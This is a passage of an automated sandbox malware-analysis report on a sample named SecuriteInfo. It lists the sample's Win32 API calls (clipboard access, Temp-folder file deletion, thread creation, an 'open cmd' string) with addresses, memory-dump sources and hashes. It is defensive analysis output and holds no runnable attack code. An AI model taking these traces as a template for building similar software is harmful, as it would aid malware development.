                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 22253138ce9d688b3f17daec7edef24fdb7bdc72d87b37ed95829791f1385de5
                                                      • Instruction ID: be966910c112319e13f3474517542a813bf40e0eb25e6fd9a20f15f2fd6a5ca7
                                                      • Opcode Fuzzy Hash: 22253138ce9d688b3f17daec7edef24fdb7bdc72d87b37ed95829791f1385de5
                                                      • Instruction Fuzzy Hash: D5C0127050470456D1607F759E4FE553E645B40339B504725B0F9B00F1CB3C6699855D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405719
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405728
                                                      • GetClientRect.USER32(?,?), ref: 00405765
                                                      • GetSystemMetrics.USER32(00000002), ref: 0040576C
                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057F4
                                                      • ShowWindow.USER32(?,00000008), ref: 00405808
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405829
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405737
                                                        • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040587B
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000564F,00000000), ref: 00405889
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405890
                                                      • ShowWindow.USER32(00000000), ref: 004058B4
                                                      • ShowWindow.USER32(?,00000008), ref: 004058B9
                                                      • ShowWindow.USER32(00000008), ref: 00405903
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
                                                      • CreatePopupMenu.USER32 ref: 00405948
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040595C
                                                      • GetWindowRect.USER32(?,?), ref: 0040597C
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
                                                      • OpenClipboard.USER32(00000000), ref: 004059DD
                                                      • EmptyClipboard.USER32 ref: 004059E3
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
                                                      • GlobalLock.KERNEL32(00000000), ref: 004059F9
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A38
                                                      • CloseClipboard.USER32 ref: 00405A3E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {
                                                      • API String ID: 590372296-366298937
                                                      • Opcode ID: 03cf949efa33a50c7b71d7009e7ac7f0f710837cb8ab8d2d50aa17df60b966e9
                                                      • Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
                                                      • Opcode Fuzzy Hash: 03cf949efa33a50c7b71d7009e7ac7f0f710837cb8ab8d2d50aa17df60b966e9
                                                      • Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 004049B6
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004049E0
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404A91
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404A9C
                                                      • lstrcmpiW.KERNEL32(open cmd,007A1F48,00000000,?,?), ref: 00404ACE
                                                      • lstrcatW.KERNEL32(?,open cmd), ref: 00404ADA
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AEC
                                                        • Part of subcall function 00405B5E: GetDlgItemTextW.USER32(?,?,00000400,00404B23), ref: 00405B71
                                                        • Part of subcall function 004067A1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406804
                                                        • Part of subcall function 004067A1: CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406813
                                                        • Part of subcall function 004067A1: CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406818
                                                        • Part of subcall function 004067A1: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 0040682B
                                                      • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BCA
                                                        • Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                                                        • Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
                                                        • Part of subcall function 00404D23: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404DE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: A$open cmd
                                                      • API String ID: 2624150263-2790819922
                                                      • Opcode ID: 43370ad54982c8dc28cc1873a7eafa11ef240cc5c4e1ff012c87e88bf0d14c6b
                                                      • Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
                                                      • Opcode Fuzzy Hash: 43370ad54982c8dc28cc1873a7eafa11ef240cc5c4e1ff012c87e88bf0d14c6b
                                                      • Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405C4F
                                                      • lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405CC0
                                                      • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405CD0
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
                                                      • FindClose.KERNEL32(00000000), ref: 00405D7F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: .$.$C:\Users\user~1\AppData\Local\Temp\$P?z$\*.*
                                                      • API String ID: 2035342205-917880618
                                                      • Opcode ID: 814ced211d4ca8f05d8f3c88103f298c287939ceba757f4f6ee6bf0cfa06a098
                                                      • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                                                      • Opcode Fuzzy Hash: 814ced211d4ca8f05d8f3c88103f298c287939ceba757f4f6ee6bf0cfa06a098
                                                      • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00402269
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                      • API String ID: 542301482-3291747264
                                                      • Opcode ID: 1811bc25c9a4c8aebb4cdb7ef2826e2c2a25f9d2a9cfe56534a608318fa0e58a
                                                      • Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
                                                      • Opcode Fuzzy Hash: 1811bc25c9a4c8aebb4cdb7ef2826e2c2a25f9d2a9cfe56534a608318fa0e58a
                                                      • Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindFirstFileW.KERNEL32(771B3420,007A4F98,007A4750,00405F3A,007A4750,007A4750,00000000,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 0040685B
                                                      • FindClose.KERNEL32(00000000), ref: 00406867
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                      • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                                                      • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                      • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 6fe8bad3e4f445c36a954bdba87cd56b1d6253f4c6ae1ca58158b1ff26ba5557
                                                      • Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
                                                      • Opcode Fuzzy Hash: 6fe8bad3e4f445c36a954bdba87cd56b1d6253f4c6ae1ca58158b1ff26ba5557
                                                      • Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404EFB
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404F06
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F67
                                                      • SetWindowLongW.USER32(?,000000FC,004054F0), ref: 00404F80
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
                                                      • DeleteObject.GDI32(00000000), ref: 00404FDD
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF
                                                        • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405121
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040512F
                                                      • ShowWindow.USER32(?,00000005), ref: 0040513F
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040530D
                                                      • GlobalFree.KERNEL32(?), ref: 0040531D
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
                                                      • ShowWindow.USER32(?,00000000), ref: 004054C7
                                                      • GetDlgItem.USER32(?,000003FE), ref: 004054D2
                                                      • ShowWindow.USER32(00000000), ref: 004054D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 2564846305-813528018
                                                      • Opcode ID: 678dda1956c76501b884b31d864f32cfb9dffbcc261a7e54856ad0407b5978bb
                                                      • Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
                                                      • Opcode Fuzzy Hash: 678dda1956c76501b884b31d864f32cfb9dffbcc261a7e54856ad0407b5978bb
                                                      • Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                                                      • ShowWindow.USER32(?), ref: 00403FD3
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                                                      • ShowWindow.USER32(?,00000004), ref: 00403FFE
                                                      • DestroyWindow.USER32 ref: 00404012
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
                                                      • GetDlgItem.USER32(?,?), ref: 0040404A
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                                                      • IsWindowEnabled.USER32(00000000), ref: 00404065
                                                      • GetDlgItem.USER32(?,00000001), ref: 00404110
                                                      • GetDlgItem.USER32(?,00000002), ref: 0040411A
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404134
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                                                      • GetDlgItem.USER32(?,00000003), ref: 0040422B
                                                      • ShowWindow.USER32(00000000,?), ref: 0040424C
                                                      • EnableWindow.USER32(?,?), ref: 0040425E
                                                      • EnableWindow.USER32(?,?), ref: 00404279
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
                                                      • EnableMenuItem.USER32(00000000), ref: 00404296
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                                                      • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                                                      • SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
                                                      • ShowWindow.USER32(?,0000000A), ref: 00404433
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                      • String ID:
                                                      • API String ID: 1860320154-0
                                                      • Opcode ID: 6d11154a05db4576e87e051277fe7e4c000e330e65fc392688a6db0da7409f81
                                                      • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                                                      • Opcode Fuzzy Hash: 6d11154a05db4576e87e051277fe7e4c000e330e65fc392688a6db0da7409f81
                                                      • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046E7
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
                                                      • GetSysColor.USER32(?), ref: 00404715
